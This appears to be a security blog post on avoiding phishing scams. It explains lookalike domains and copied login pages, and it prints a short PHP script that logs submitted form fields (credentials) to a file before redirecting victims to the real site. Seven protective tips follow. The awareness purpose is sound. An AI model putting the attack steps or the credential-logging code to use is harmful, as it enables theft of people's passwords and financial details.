ULTIMATE WAYS TO PROTECT YOURSELF FROM PHISHING SCAMS

              Before starting with the topic one should be clear definition of Phishing. Phishing is a way of attempting to acquire sensitive information such as passwords,usernames, and credit card details by masquerading as a trustworthy entity in an electronic communication. This is similar as Fishing, where the fisherman puts a bait at the hook and pretend to be a genuine food for fish. But the hook inside it takes the complete fish out of the lake. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

        Here in this post we will discus a little about what is phishing. Please note what we are covering is ways to protect yourself from phishing scams here is just basics and not a phishing tutorial. In phishing attack, an attacker creates a fake login page of a legitimate website and lures victim to login using it. The site under attack is known as phished site and the fake login page used for capturing or stealing information is known as phished page.To perform phishing attack an attacker performs following steps as given below:

       

First of all he gets a free web host and then selects a domain which somehow resembles the site he wants to phish. For example to hack Gmail password he/she might select domain like Gmial. Look carefully both words appear nearly similar when just overlooked and that is where an attacker makes a catch. Next he opens the site he wants to phish and saves it on his/her desktop then he/she uploads those files to their own domain. The attacker then creates a web page with a sorry or error message to make victim believe site is temporarily down or under maintenance or he types following lines in php file and uploads it to his/her domain

<?php
header (‘Location: ‘www.realdomainname.com’);
$handle = fopen(“log.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

          Where he/she replace red background URL by real URL of phished page. Then this file is also uploaded there so that victim should get redirected to original website to avoid detection of phishing attack.

            Nearly all phishing attacks are conducted in same way. If you have been regular reader of my blog then you might know we have already covered Top 10 ways to hack facebook account. For practice in future we will cover few more tutorials on phishing but now lets protect yourself from phishing scams as given below.

          

 WHAT ARE THE WAYS TO PROTECT YOURSELF FROM PHISHING SCAMS-HOW TO AVOID PHISHING ATTACK

        There are many common problems which lead to security risks and can damage computers and your system too. Social media access unintentionally leads to viruses or malware because of phishing sites that appear to be legitimate. Email attachments from unknown sender or even familiar sources may be malicious for you.

       On the web, things are not always as they seem. Although a filename may look like it is legitimate, it could carry a completely different program i.e it can be a keylogger.

       There is no guarantee that you or your employees will not download a malicious file by mistake, but it is important to take steps to prevent it. Down below are some tips to protect yourself against phishing attack.

ULTIMATE WAYS TO PROTECT YOURSELF FROM PHISHING SCAMS

#1  The best way to recognize a phishing attempt is to be suspicious of unsolicited phone calls, visits, or email messages from individuals asking about employees or other internal information. If an unknown individual claims to be from a legitimate organization, try to verify his or her identity directly with the company.

#2  Do not provide personal information or information about your organization, including its structure or networks, unless you are certain of a person’s authority to have the information.

#3  Do not reveal personal or financial information in email, and do not respond to email solicitations if you want to protect yourself from phishing scams. This includes following links sent in email.

#4  Don’t send sensitive information over the Internet before checking a website’s security

#5  If you want to protect yourself from phishing scams always pay attention to the URL of a website. Malicious websites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain (e.g.,.com vs..net).

#6  If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Do not use contact information provided on a website connected to the request; instead, check previous statements for contact information. Information about known phishing attacks is also available online from groups such as the AntiPhishing Working Group

#7  Install and maintain anti-virus software, firewalls, and email filters to reduce some of this traffic. Take advantage of any anti-phishing features offered by your email client and web browser.

SHARES

Share

Pin it

Tweet

Share

Share

Share

Buffer

Print